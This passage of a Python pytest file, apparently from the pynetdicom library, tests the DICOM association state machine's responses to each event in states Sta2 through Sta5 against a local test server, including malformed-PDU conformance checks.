self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.shutdown()
time.sleep(0.5)
assert fsm._transitions[:2] == ['Sta2', 'Sta1']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt17', 'AA-5')
]
assert fsm._events[:2] == ['Evt5', 'Evt17']
def test_evt18(self):
"""Test Sta2 + Evt18."""
# Sta2 + Evt18 -> AA-2 -> Sta1
# Evt18: ARTIM timer expired from <local service>
commands = [
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.artim_timer.timeout = 0.05
assoc.dul.artim_timer.start()
time.sleep(0.5)
scp.step()
scp.shutdown()
assert fsm._transitions[:1] == ['Sta2']
assert fsm._changes[:1] == [
('Sta1', 'Evt5', 'AE-5'),
]
assert fsm._events[:2] == ['Evt5', 'Evt18']
def test_evt19(self):
"""Test Sta2 + Evt19."""
# Sta2 + Evt19 -> AA-1 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-1: Send A-ABORT PDU, start ARTIM
commands = [
('send', b'\x08\x00\x00\x00\x00\x00\x00\x00'),
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta13']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt19', 'AA-1')
]
assert fsm._events[:2] == ['Evt5', 'Evt19']
@pytest.mark.filterwarnings("ignore:.*:pytest.PytestUnhandledThreadExceptionWarning")
class TestState03(TestStateBase):
"""Tests for State 03: Awaiting A-ASSOCIATE (rsp) primitive."""
def move_to_state(self, assoc, scp):
assoc.start()
scp.step()
self.wait_on_state(assoc.dul.state_machine, 'Sta3')
def test_evt01(self):
"""Test Sta3 + Evt1."""
# Sta3 + Evt1 -> <ignore> -> Sta3
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('send', a_associate_rq),
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
pass
assoc.acse._negotiate_as_acceptor = _neg_as_acc
self.move_to_state(assoc, scp)
assoc.dul.send_pdu(self.get_associate('request'))
scp.step()
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt1']
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta3 + Evt2."""
# Sta3 + Evt2 -> <ignore> -> Sta3
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta3 + Evt3."""
# Sta3 + Evt3 -> AA-8 -> Sta13
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
('send', a_associate_ac),
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
pass
assoc.acse._negotiate_as_acceptor = _neg_as_acc
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt3', 'AA-8')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt3']
def test_evt04(self):
"""Test Sta3 + Evt4."""
# Sta3 + Evt4 -> AA-8 -> Sta13
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
('send', a_associate_rj),
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
pass
assoc.acse._negotiate_as_acceptor = _neg_as_acc
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt4', 'AA-8')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt4']
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta3 + Evt5."""
# Sta3 + Evt5 -> <ignore> -> Sta3
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06(self):
"""Test Sta3 + Evt6."""
# Sta3 + Evt6 -> AA-8 -> Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
('send', a_associate_rq),
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
pass
assoc.acse._negotiate_as_acceptor = _neg_as_acc
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt6', 'AA-8')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt6']
def test_evt07(self):
"""Test Sta3 + Evt7."""
# Sta3 + Evt7 -> AE-7 -> Sta6
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
# AE-7: Send A-ASSOCIATE-AC PDU
commands = [
('send', a_associate_rq),
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.shutdown()
assert fsm._transitions[:3] == ['Sta2', 'Sta3', 'Sta6']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt7']
def test_evt08(self):
"""Test Sta3 + Evt8."""
# Sta3 + Evt8 -> AE-8 -> Sta13
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
# AE-8: Send A-ASSOCIATE-RJ PDU and start ARTIM
commands = [
('send', a_associate_rq),
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
assoc.dul.send_pdu(self.get_associate('reject'))
assoc.acse._negotiate_as_acceptor = _neg_as_acc
self.move_to_state(assoc, scp)
scp.step()
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt8', 'AE-8')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt8']
def test_evt09(self):
"""Test Sta3 + Evt9."""
# Sta3 + Evt9 -> <ignore> -> Sta3
# Evt9: Receive P-DATA primitive from <local user>
commands = [
('send', a_associate_rq),
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
assoc.dul.send_pdu(self.get_pdata())
assoc.acse._negotiate_as_acceptor = _neg_as_acc
self.move_to_state(assoc, scp)
scp.step()
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt9']
def test_evt10(self):
"""Test Sta3 + Evt10."""
# Sta3 + Evt10 -> AA-8 -> Sta13
# Evt10: Receive P-DATA-TF PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
('send', p_data_tf),
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
# Keep the state machine in Sta3 for 0.5 s
scp.step()
time.sleep(0.5)
orig()
assoc.acse._negotiate_as_acceptor = _neg_as_acc
self.move_to_state(assoc, scp)
scp.step()
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt10', 'AA-8')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt10']
def test_evt11(self):
"""Test Sta3 + Evt11."""
# Sta3 + Evt11 -> <ignore> -> Sta3
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('send', a_associate_rq),
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
assoc.dul.send_pdu(self.get_release(False))
assoc.acse._negotiate_as_acceptor = _neg_as_acc
self.move_to_state(assoc, scp)
scp.step()
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt11']
def test_evt12(self):
"""Test Sta3 + Evt12."""
# Sta3 + Evt12 -> AA-8 -> Sta13
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
('send', a_release_rq),
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
# Keep the state machine in Sta3 for 0.5 s
scp.step()
time.sleep(0.5)
orig()
assoc.acse._negotiate_as_acceptor = _neg_as_acc
self.move_to_state(assoc, scp)
scp.step()
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt12', 'AA-8')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt12']
def test_evt13(self):
"""Test Sta3 + Evt13."""
# Sta3 + Evt13 -> AA-8 -> Sta13
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
('send', a_release_rp),
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
# Keep the state machine in Sta3 for 0.5 s
scp.step()
time.sleep(0.5)
orig()
assoc.acse._negotiate_as_acceptor = _neg_as_acc
self.move_to_state(assoc, scp)
scp.step()
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt13', 'AA-8')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt13']
def test_evt14(self):
"""Test Sta3 + Evt14."""
# Sta3 + Evt14 -> <ignore> -> Sta3
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
commands = [
('send', a_associate_rq),
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
assoc.dul.send_pdu(self.get_release(True))
assoc.acse._negotiate_as_acceptor = _neg_as_acc
self.move_to_state(assoc, scp)
scp.step()
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt14']
def test_evt15(self):
"""Test Sta3 + Evt15."""
# Sta3 + Evt15 -> AA-1 -> Sta13
# Evt15: Receive A-ABORT (rq) primitive from <local user>
# AA-1: Send A-ABORT PDU, start ARTIM
commands = [
('send', a_associate_rq),
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
assoc.dul.send_pdu(self.get_abort())
assoc.acse._negotiate_as_acceptor = _neg_as_acc
self.move_to_state(assoc, scp)
scp.step()
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt15', 'AA-1'),
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt15']
def test_evt16(self):
"""Test Sta3 + Evt16."""
# Sta3 + Evt16 -> AA-3 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-3: Issue A-ABORT or A-P-ABORT primitive, close connection
commands = [
('send', a_associate_rq),
('send', a_abort),
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
# Keep the state machine in Sta3 for 0.5 s
scp.step()
time.sleep(0.5)
orig()
assoc.acse._negotiate_as_acceptor = _neg_as_acc
self.move_to_state(assoc, scp)
scp.step()
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt16', 'AA-3')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt16']
def test_evt17(self):
"""Test Sta3 + Evt17."""
# Sta3 + Evt17 -> AA-4 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AA-4: Issue A-P-ABORT primitive
commands = [
('send', a_associate_rq),
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
# Keep the state machine in Sta3 for 0.5 s
time.sleep(0.5)
orig()
assoc.acse._negotiate_as_acceptor = _neg_as_acc
self.move_to_state(assoc, scp)
scp.step()
scp.shutdown()
time.sleep(0.5)
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt17', 'AA-4')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt17']
def test_evt18(self):
"""Test Sta3 + Evt18."""
# Sta3 + Evt18 -> <ignore> -> Sta3
# Evt18: ARTIM timer expired from <local service>
commands = [
('send', a_associate_rq),
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
# Keep the state machine in Sta3 for 0.5 s
assoc.dul.artim_timer.timeout = 0.05
assoc.dul.artim_timer.start()
time.sleep(0.5)
scp.step()
orig()
assoc.acse._negotiate_as_acceptor = _neg_as_acc
self.move_to_state(assoc, scp)
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:2] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt18']
def test_evt19(self):
"""Test Sta3 + Evt19."""
# Sta3 + Evt19 -> AA-8 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
('send', b'\x08\x00\x00\x00\x00\x00\x00\x00'),
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
# Keep the state machine in Sta3 for 0.5 s
scp.step()
time.sleep(0.5)
orig()
assoc.acse._negotiate_as_acceptor = _neg_as_acc
self.move_to_state(assoc, scp)
scp.step()
scp.shutdown()
assert fsm._transitions[:2] == ['Sta2', 'Sta3']
assert fsm._changes[:3] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt19', 'AA-8')
]
assert fsm._events[:3] == ['Evt5', 'Evt6', 'Evt19']
@pytest.mark.filterwarnings("ignore:.*:pytest.PytestUnhandledThreadExceptionWarning")
class TestState04(TestStateBase):
"""Tests for State 04: Awaiting TRANSPORT_OPEN from <transport service>."""
def move_to_state(self, assoc, scp):
def connect(address):
"""Override the socket's connect so no event gets added."""
if assoc.dul.socket.socket is None:
assoc.dul.socket.socket = (
assoc.dul.socket._create_socket()
)
try:
assoc.dul.socket.socket.connect(address)
assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
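                    # Close quietly; don't queue a transport-closed event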
assoc.dul.socket.close()
assoc.dul.socket.connect = connect
assoc.start()
self.wait_on_state(assoc.dul.state_machine, 'Sta4')
def test_evt01(self):
"""Test Sta4 + Evt1."""
# Sta4 + Evt1 -> <ignore> -> Sta4
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate('request'))
scp.step()
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt1']
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta4 + Evt2."""
# Sta4 + Evt2 -> <ignore> -> Sta4
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta4 + Evt3."""
# Sta4 + Evt3 -> <ignore> -> Sta4
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
commands = [
('send', a_associate_ac),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt3']
def test_evt04(self):
"""Test Sta4 + Evt4."""
# Sta4 + Evt4 -> <ignore> -> Sta4
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
commands = [
('send', a_associate_rj),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt4']
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta4 + Evt5."""
# Sta4 + Evt5 -> AE-5 -> Sta2
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
# AE-5: Issue TRANSPORT_RESPONSE to <transport service>
# Start ARTIM timer
pass
def test_evt06(self):
"""Test Sta4 + Evt6."""
# Sta4 + Evt6 -> <ignore> -> Sta4
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
commands = [
('send', a_associate_rq),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt6']
def test_evt07(self):
"""Test Sta4 + Evt7."""
# Sta4 + Evt7 -> <ignore> -> Sta4
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate('accept'))
scp.step()
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt7']
def test_evt08(self):
"""Test Sta4 + Evt8."""
# Sta4 + Evt8 -> <ignore> -> Sta4
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate('reject'))
scp.step()
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt8']
def test_evt09(self):
"""Test Sta4 + Evt9."""
# Sta4 + Evt9 -> <ignore> -> Sta4
# Evt9: Receive P-DATA primitive from <local user>
commands = [
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_pdata())
scp.step()
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt9']
def test_evt10(self):
"""Test Sta4 + Evt10."""
# Sta4 + Evt10 -> <ignore> -> Sta4
# Evt10: Receive P-DATA-TF PDU from <remote>
commands = [
('send', p_data_tf),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt10']
def test_evt11(self):
"""Test Sta4 + Evt11."""
# Sta4 + Evt11 -> <ignore> -> Sta4
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_release(False))
scp.step()
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt11']
def test_evt12(self):
"""Test Sta4 + Evt12."""
# Sta4 + Evt12 -> <ignore> -> Sta4
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
commands = [
('send', a_release_rq),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt12']
def test_evt13(self):
"""Test Sta4 + Evt13."""
# Sta4 + Evt13 -> <ignore> -> Sta4
# Evt13: Receive A-RELEASE-RP PDU from <remote>
commands = [
('send', a_release_rp),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt13']
def test_evt14(self):
"""Test Sta4 + Evt14."""
# Sta4 + Evt14 -> <ignore> -> Sta4
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
commands = [
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_release(True))
scp.step()
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt14']
def test_evt15(self):
"""Test Sta4 + Evt15."""
# Sta4 + Evt15 -> <ignore> -> Sta4
# Evt15: Receive A-ABORT (rq) primitive from <local user>
commands = [
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_abort())
scp.step()
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt15']
def test_evt16(self):
"""Test Sta4 + Evt16."""
# Sta4 + Evt16 -> <ignore> -> Sta4
# Evt16: Receive A-ABORT PDU from <remote>
commands = [
('send', a_abort),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt16']
def test_evt17(self):
"""Test Sta4 + Evt17."""
# Sta4 + Evt17 -> <ignore> -> Sta4
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
commands = [
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.shutdown()
time.sleep(0.5)
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt17']
def test_evt18(self):
"""Test Sta4 + Evt18."""
# Sta4 + Evt18 -> <ignore> -> Sta4
# Evt18: ARTIM timer expired from <local service>
commands = [
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.artim_timer.timeout = 0.05
self.assoc.dul.artim_timer.start()
time.sleep(0.5)
scp.step()
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt18']
def test_evt19(self):
"""Test Sta4 + Evt19."""
# Sta4 + Evt19 -> <ignore> -> Sta4
# Evt19: Received unrecognised or invalid PDU from <remote>
commands = [
('send', b'\x08\x00\x00\x00\x00\x00\x00\x00\x00'),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._transitions[:1] == ['Sta4']
assert self.fsm._changes[:1] == [
('Sta1', 'Evt1', 'AE-1'),
]
assert self.fsm._events[:2] == ['Evt1', 'Evt19']
@pytest.mark.filterwarnings("ignore:.*:pytest.PytestUnhandledThreadExceptionWarning")
class TestState05(TestStateBase):
"""Tests for State 05: Awaiting A-ASSOCIATE-AC or A-ASSOCIATE-RJ PDU."""
def move_to_state(self, assoc, scp):
assoc.start()
scp.step()
self.wait_on_state(assoc.dul.state_machine, 'Sta5')
def test_evt01(self):
"""Test Sta5 + Evt1."""
# Sta5 + Evt1 -> <ignore> -> Sta5
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('recv', None), # recv a-associate-rq
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate('request'))
scp.step()
scp.shutdown()
assert self.fsm._changes[:2] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
]
assert self.fsm._transitions[:2] == ['Sta4', 'Sta5']
assert self.fsm._events[:3] == ['Evt1', 'Evt2', 'Evt1']
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta5 + Evt2."""
# Sta5 + Evt2 -> <ignore> -> Sta5
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta5 + Evt3."""
# Sta5 + Evt3 -> AE-3 -> Sta6
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AE-3: Issue A-ASSOCIATE (ac) primitive
commands = [
('recv', None),
('send', a_associate_ac),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:3] == [
